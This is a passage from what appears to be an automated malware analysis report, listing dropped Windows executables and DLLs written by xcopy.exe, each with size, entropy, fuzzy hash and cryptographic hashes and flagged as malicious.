                                                                                                                                                                                                                                  SHA-512:F827C979C548F36B125A46931186A662AD89D94E32EDE78A680EBA8A6D475DF89D47AD997FE7D74FE122E0D92EA689648586E74E51CECE55BC7C128068D15A87
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):257664
                                                                                                                                                                                                                                  Entropy (8bit):6.804363186795068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:w+TwJLYbH0QQchx73BeFStIhEWDoZvynCME:T6EbH0j4x7R6SvyCME
                                                                                                                                                                                                                                  MD5:9DAA53BAB2ECB33DC0D9CA51552701FA
                                                                                                                                                                                                                                  SHA1:2BF0F6B7A5A3DCCBE47CC464D63B52E0C3A85F0D
                                                                                                                                                                                                                                  SHA-256:E0D055BB9D81BC554A75176FE821ADD4B5DC18AD3557E9A731B4F6D3EBFAD751
                                                                                                                                                                                                                                  SHA-512:8F1076AEB7FE26ACF4A9D0F2E05FA841A9F5A1040F826A33226D361427DEE88150D46530C87E67E509E8174B968D53D1B5EABC5BCBE1402EF72D442AA08337D1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30848
                                                                                                                                                                                                                                  Entropy (8bit):6.78330656156103
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:S+dZDd1be3tiktnTnfPPohw64TJjjo5zArHOxIYi1owPxh8E9VF0NyznFjKt:PDXbXcfHzhTYaHOmYifPxWEJA
                                                                                                                                                                                                                                  MD5:2C9D9BCB96F5E3455FD096E6C49F0A43
                                                                                                                                                                                                                                  SHA1:D8C6F11F290E8FECBD1DD14AAB97346009BC7CBF
                                                                                                                                                                                                                                  SHA-256:44CD1C1104EAC19CF407FBC997326D414E1838899DD8AC352A1580CEA7E55C4A
                                                                                                                                                                                                                                  SHA-512:46D57CAEA92554B6F6067EF4C7F333DB92C9B87E8F697086AA1EC37113D59C73869813A9363BCB46ABD6E8FD68480BD37725370F7A876D16A2B5AC59684551B8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):222848
                                                                                                                                                                                                                                  Entropy (8bit):6.561063206660714
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:xmS8JPkixLg4yQKFK890ImYG1AjQ8POyfvWlb:xmS8JPki646FPqIa8POUvWlb
                                                                                                                                                                                                                                  MD5:590B782C3D2B8F877DEA800AC37CF75E
                                                                                                                                                                                                                                  SHA1:11203D09DF0D82613116FF411513D6B42663C6F2
                                                                                                                                                                                                                                  SHA-256:D9259F2CA2C6061F108EEEC069068DB1B74A7E9D73C8E5F965230131D1F12F77
                                                                                                                                                                                                                                  SHA-512:62686A93FA3954B31947423721AF034E121977D52020B1823D305AFFC4310E9B116A90AE256182BE0799E1A5789A5A5DFDB0DFF350BA129D6DFD8A7C0D5B7288
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):94336
                                                                                                                                                                                                                                  Entropy (8bit):6.2191141428832335
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:JPEoCW/ids8nBs+s8nBs8RGyeVK7qjh3rmKPNbS7cZPxyI:JFrj8wyutjZqMNbSgxL
                                                                                                                                                                                                                                  MD5:880941DFF89465EDB837E5366DDE07B1
                                                                                                                                                                                                                                  SHA1:E624187B592B664E1BB0549188B2B6094DC3B226
                                                                                                                                                                                                                                  SHA-256:8CDCBFD67668E1007D1B745E2FA1B84B9E6684FCCB2316915696CB8737DC4601
                                                                                                                                                                                                                                  SHA-512:9263DCDA1396D5158126F266168FB4529F81AD49B5017FA340B69698B429BACBE41EBC3E32FEC94A1D2CB5AA2797B4F3409F1A6E79D03177805CDB847BB206DA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):63104
                                                                                                                                                                                                                                  Entropy (8bit):6.7192278703816175
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:SoIVooMSJPA4rapntjMqI5JT8wcaZ5Z7YPxH:SoIWzWapnhMqM8wcazZ0xH
                                                                                                                                                                                                                                  MD5:9F1F7D5128818128366FC7C2373C44E2
                                                                                                                                                                                                                                  SHA1:35C588B5A5BB64288C6D10F74B2E578F4582DC16
                                                                                                                                                                                                                                  SHA-256:30CB462F6DC6F3EC0DB27045A661CF852AB1BFE9BBD203C66FC9353905A910EA
                                                                                                                                                                                                                                  SHA-512:1D4BD5E04387F018C7FFDE51C7810F49684A1860E6DFA6693470D6379A2754A218EA4AEAA78356C7442FB52D2274FD9B3E7C76C123EBE054EA56516C4FFEDBDA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):145024
                                                                                                                                                                                                                                  Entropy (8bit):6.626516549866549
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:zAKw6HXE3VJF6veoci2pd9Vvv1TuwJelVAM962ZdrQzoGxj:zAtB33Ie9i2pd9Vvv1TuwJW5drQt
                                                                                                                                                                                                                                  MD5:96BADB6A5EFDFC1F9D351CFECD7EA7B8
                                                                                                                                                                                                                                  SHA1:13D23EBE595DCB2214105068E717259DB32C596F
                                                                                                                                                                                                                                  SHA-256:417537B339CA24B75CE0637683B42F0B5F67CC71B5D1FB6FC50F17F1C91BF5B3
                                                                                                                                                                                                                                  SHA-512:8A07DD45F25B73A497299A601898FA4D4711701F55D6172EE25DB9F9CBD981F710FB5A627C62340511CF565E449DAE4A458EE21A76ADF41E5923D0C75E47E034
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):257664
                                                                                                                                                                                                                                  Entropy (8bit):6.807316395240072
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):396416
                                                                                                                                                                                                                                  Entropy (8bit):6.390753556955542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19584
                                                                                                                                                                                                                                  Entropy (8bit):6.785172982743353
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):177280
                                                                                                                                                                                                                                  Entropy (8bit):6.713912669785536
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29824
                                                                                                                                                                                                                                  Entropy (8bit):6.712871246563921
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):117376
                                                                                                                                                                                                                                  Entropy (8bit):6.624138935674876
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60669056
                                                                                                                                                                                                                                  Entropy (8bit):6.693142467576719
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.82213594687011
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):225408
                                                                                                                                                                                                                                  Entropy (8bit):6.823928021904215
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:NOPWyjlIPa1Kjw4dLoylXoAVLhGrtWJXzgMjGPKinN5uehz2D/0YvTKV7PUJrKc6:oDjlIpjweXpl4CiSehc/pvT8UJrKcnJs
                                                                                                                                                                                                                                  MD5:825468A63B1D6917D73035C038D2B7D5
                                                                                                                                                                                                                                  SHA1:34576CDD6868E01FA0AEBCB2BF7E27484E9581D2
                                                                                                                                                                                                                                  SHA-256:BC6A888CE01FE7EC8356AFDAB744C999800D391FBFC70041D961D03C9EE4F006
                                                                                                                                                                                                                                  SHA-512:E694A96695EFD259322C013C7D094B1C837746E472435CF4D446DBDE41CD683B651D9ACD9621CF1AEC3129E3E25DAB392991B23FD8D10BEEAEE144C59AB43F13
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):279680
                                                                                                                                                                                                                                  Entropy (8bit):6.110165526137236
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:pYq4xDPMvHf8SuJTA3BOmVhTFpSwoMYzApMOjYvCwZ7GNpQGPDwvrWJNW55LtVb9:YLMSiBOmVheAb/saYhBNWupVqi5rZ1b
                                                                                                                                                                                                                                  MD5:6582998BB860EAC44D51B63DF17DA488
                                                                                                                                                                                                                                  SHA1:2C08294AC82F1A2D15B330D3B8AD94E882D66AEE
                                                                                                                                                                                                                                  SHA-256:51BB85B12D2389344CF1CC9944ABFE3D5860264471386660A9A39BC099C0EC3A
                                                                                                                                                                                                                                  SHA-512:828481087EAB453E8842B93F808028094FE69ADA03F18F9CC3831AC7EB08DA1AD3B1583C2107F28A3BF34449E0510939B646E345FC544EBA5C8C1FC9EFA59C7D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):121984
                                                                                                                                                                                                                                  Entropy (8bit):6.270079037519984
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:r834fRZ5Nyf446dewltB2mNd/HOrveW1dex6:s446d7T/H47
                                                                                                                                                                                                                                  MD5:D2A9769D940F6FC579FEBFDA0EC9053A
                                                                                                                                                                                                                                  SHA1:280FD5BA256A50D8CC812F5DD3B96E1CE9BFF7CB
                                                                                                                                                                                                                                  SHA-256:6FF9E17276C12E642A92A70A92B76784387C8C417A232AB8377C0C7F3E565575
                                                                                                                                                                                                                                  SHA-512:7606A6958CEE14AC05348901BC54901888277208B00153F8C4012AFAD175A003A4BC9C87D587563739B98CBC2F8407C27AE3A5C0C11924CB9A6ED5D6FF62A73C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):26240
                                                                                                                                                                                                                                  Entropy (8bit):6.696148567294591
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:ejN7os9RC3z2moP/S6I0YiwLPxWEIQbxs:u7oawK3I07iPxNxs
                                                                                                                                                                                                                                  MD5:AC403F097B4FAEE109EE47BC7AE81859
                                                                                                                                                                                                                                  SHA1:53D98BA27BD82B83901DB796B020C8F72327F8C3
                                                                                                                                                                                                                                  SHA-256:38E01261E734CDDEDF72EFEA639421E54EB7CB25510EC8D370DF6B0EFA8785E1
                                                                                                                                                                                                                                  SHA-512:63E1773EF1797037652F3C226A2FF02E1D2458724D6023A6F6C667B3AAFEFE4DD6FC955FEB972A3E205E061FF30E01A36465D8390380D800B3BC4ADF6D7EA41A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):288896
                                                                                                                                                                                                                                  Entropy (8bit):6.401378311812531
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:yD8UCue7q2UvkrHsorMh5UuI1uNu4eHZnkaCKfvRGa/:yDsG2UvkrHJrMhC9tkSvRGa/
                                                                                                                                                                                                                                  MD5:165F1A3E19E22E130AFC2D002F9D844B
                                                                                                                                                                                                                                  SHA1:DA1BFBDB639F731E24F2A07927C9E2D6A8460017
                                                                                                                                                                                                                                  SHA-256:9B41836022F06ED1E4F5890C33C8D01494CE83E090D175F4CD4BFD04DB1C5DB0
                                                                                                                                                                                                                                  SHA-512:46FDC46BBDF987318679B3EE71E4079A4D580001ADA76777E4D873A81EF249BA93D41BF5D17B3FF7365CB2C1AE8B3A818477B404ED4C8FC7259F3B2B52B488DE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):172160
                                                                                                                                                                                                                                  Entropy (8bit):6.607037131587982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:RtGMrDdbJ2hvUKb4GPanaP5tsN7Ra3mwoXJum6xq+Mvz08x7xo:vGMrDdbJQvUm4GPOWyLXJ3SMvz6
                                                                                                                                                                                                                                  MD5:C05198384B1A29D40973078185620016
                                                                                                                                                                                                                                  SHA1:FC6C1995FA4E7D7D7913F4635023E815B04E4404
                                                                                                                                                                                                                                  SHA-256:C9CC896ED6BEFD7D69595325FBCC008A07A329ABB7CAC86D5BEA4D590846D3AC
                                                                                                                                                                                                                                  SHA-512:A0FFFD5E9A1A8049E92A1D643D4FC64767E1A1A0BA9C31FB2ED6F62FB07F4160F2EC7612018F8E6A4FB379A39CB4F65F73EB232B6E9B6DCD445A8ECC8E86EB7D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8062632606189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37504
                                                                                                                                                                                                                                  Entropy (8bit):6.783630059604455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33408
                                                                                                                                                                                                                                  Entropy (8bit):6.808065830698542
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.820987576744676
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.823937787322992
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8271249514534915
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.821823289010758
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):223360
                                                                                                                                                                                                                                  Entropy (8bit):6.5072198448423
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):40576
                                                                                                                                                                                                                                  Entropy (8bit):6.68958929409043
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:plpSzOJ6Egd8886GM8jG0tJ1xcbC4fPYixPxWE2/i:WOBgdmMWGcJ1Gbt7xPxii
                                                                                                                                                                                                                                  MD5:D29327340A01A47B870606432E1CA9A4
                                                                                                                                                                                                                                  SHA1:901666816E7F4DA2F1F44ABABD6E9F40084BD07B
                                                                                                                                                                                                                                  SHA-256:A721F395D134F88E0D166B7B53BA752680F9E2325EC993752D731BF8445364AB
                                                                                                                                                                                                                                  SHA-512:FD2B374450AABB8C0BF2A822F5FDA701F40920391A76751CA3917B7FF11D03CD51DD9D91FF62E322F2068569AAF46D8523581DCD047194519C790C15AF97B4EB
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):580736
                                                                                                                                                                                                                                  Entropy (8bit):6.433079705189656
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:gKCi3iPfOKtJd2/SilKlKpg/SgXWiO9fgRzkprFDvBLdkxD:mfOKtJd2/SilKlKpLgXWh9fgoFDvBLdm
                                                                                                                                                                                                                                  MD5:F53D643039D30BA967A07235ADB188A1
                                                                                                                                                                                                                                  SHA1:30FCFD99223B7C6546EA17BA53A62D02A652D3F1
                                                                                                                                                                                                                                  SHA-256:B15C6EEAAC68F383A4ADF5150C3A267A755683C06C8FAD6F6EB0063CC4F8A772
                                                                                                                                                                                                                                  SHA-512:4BBE6AFB6090B55DFDC5F5E68709F9FC978CF18F789F2E6E0C700E7B756F76C4FC5E05F20FB06EC80032E207BA2ECACDC9D13808D06A12D7223B1EA0C1EB13A8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):439208
                                                                                                                                                                                                                                  Entropy (8bit):6.6510194969003855
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:IdyX+9Tk5fb+5J56HgGwKz2zRThUgiW6QR7t5s03Ooc8dHkC2es+Fpyd:LX+9TkR+5J56AjKz2VA03Ooc8dHkC2eu
                                                                                                                                                                                                                                  MD5:FDD04DBBCF321EEE5F4DD67266F476B0
                                                                                                                                                                                                                                  SHA1:65FFDFE2664A29A41FCF5039229CCECAD5B825B9
                                                                                                                                                                                                                                  SHA-256:21570BCB7A77E856F3113235D2B05B2B328D4BB71B4FD9CA4D46D99ADAC80794
                                                                                                                                                                                                                                  SHA-512:04CFC3097FBCE6EE1B7BAC7BD63C3CFFE7DCA16F0EC9CD8FE657D8B7EBD06DCBA272FF472F98C6385C3CFB9B1AC3F47BE8CA6D3EA80AB4AEED44A0E2CE3185DD
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22952
                                                                                                                                                                                                                                  Entropy (8bit):6.5208905095857865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:nVWijIvQX2EJFJwjfXCtWcg5gWWDKLHRN7goj05seyR9zNin+2ydL:nci1GEnJqX1cAtj05sN9zI+2wL
                                                                                                                                                                                                                                  MD5:DB1A03F2A6082DE4524FE5AEDCF4E761
                                                                                                                                                                                                                                  SHA1:E8C061378EFB1889CF1E8C70FBB6622C4D31F404
                                                                                                                                                                                                                                  SHA-256:100507724EC41F00B4C81896CBD12A8CAEE4DCC6593E87999D66F05AEB7BA19D
                                                                                                                                                                                                                                  SHA-512:EDA1C49AF6A75A36170E774B4DEED0A3D0F7A031075D070A02B5CB54BEF772BF9D6AB7D2BD352EE611DA1390F54C31B2B1E536645ADF7D35D733965F8B23D4A8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):167816
                                                                                                                                                                                                                                  Entropy (8bit):6.7867736595063075
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:3ZiGNoZG+rRs3oJttTLmYv92DF36ihgyiaMiH6Aq6TNDTd0ANNsCJ:3ZNNoZL9ttTqpKMDnq6Tpd0LCJ
                                                                                                                                                                                                                                  MD5:54E49614B59D0AB117C149B837640565
                                                                                                                                                                                                                                  SHA1:DB9799F98FDC7E4C966BE3F9EF54455BEC2022A2
                                                                                                                                                                                                                                  SHA-256:DB10BA0E0672893F053823ABC3D6E8F0D2F07705878D34E8EF6CACFDA34881C1
                                                                                                                                                                                                                                  SHA-512:6ABB4BFD35188F2CE2EA482CA6E8D4C3BA466BDE3D1966931AB38A2979E620713810E2A024636B9E6947FA388CA76A7C4893924DC24B34F7D486C421752D1D39
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):89728
                                                                                                                                                                                                                                  Entropy (8bit):6.720303513765618
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:YKPhGI1Dm2s7PMJ1Y3GJvK9m+6i0R7sbDxAuum7Qh3KvGO7OW/PxZ:YKhGI1y2s7IY2FK9m+6i0KmBh3KvRnxZ
                                                                                                                                                                                                                                  MD5:6BE9951E8BE5DE319027B960E7CDF119
                                                                                                                                                                                                                                  SHA1:CD25D1A97734238F6139BB61716A273EDB6A2ADF
                                                                                                                                                                                                                                  SHA-256:CB0EF1F39DEC2019DD18347FDC772B07D0EE2A5B183A4F14CA2C0292FE5BC5A3
                                                                                                                                                                                                                                  SHA-512:1940BB95C62CE90B84CF774ED2ADAAFD3588E84C593BD6643D5E3B70E47CEE81E383AFE23105533FCD38468ACB6B92C493850A7655D3801DDC3F21F8201CD474
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):57984
                                                                                                                                                                                                                                  Entropy (8bit):6.691582292818982
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Pr+BbnfEVq+g7DMdojIIASPVFg2xnqqtvJ3fuQ0v8qXukhDHi9XXYiOPxWEpIE:Pr+BbnEsmoeKqmD0UqXhhDi9n7OPxn
                                                                                                                                                                                                                                  MD5:5ABFC7D72617230BED7563F782937D08
                                                                                                                                                                                                                                  SHA1:442BACED2A355CF1C725E682DDAEB277F248B181
                                                                                                                                                                                                                                  SHA-256:BBBD0EBE4408FC98E700B3BD0BA78C27CF08062374EA41C434F098C66455C899
                                                                                                                                                                                                                                  SHA-512:CDBB2958A87D2F5F580F81769F08D226F0F30667BE1FE3109268D0FC2A36E4DBFCD32762E8CBC183A4F814EA965C253A2FF5E724A977BF5838180F419AE011C2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23168
                                                                                                                                                                                                                                  Entropy (8bit):6.794543549263149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:8y30/NyLxN6QNGwJ5j4Jtn7Erqdju0IYi1omQtPxh8E9VF0NyB7R:c/N+7Gw0ErqZWYiKPxWE3N
                                                                                                                                                                                                                                  MD5:1C26E7A34E99455A5BF591775CC08584
                                                                                                                                                                                                                                  SHA1:9C9A2A7E2C9AF9E8DD156749222ABAC6CDCC4D64
                                                                                                                                                                                                                                  SHA-256:A65A26F8AAE2C9D244914FCFFB5C31F6CB7F3847F5732B27E06351677EAE61D3
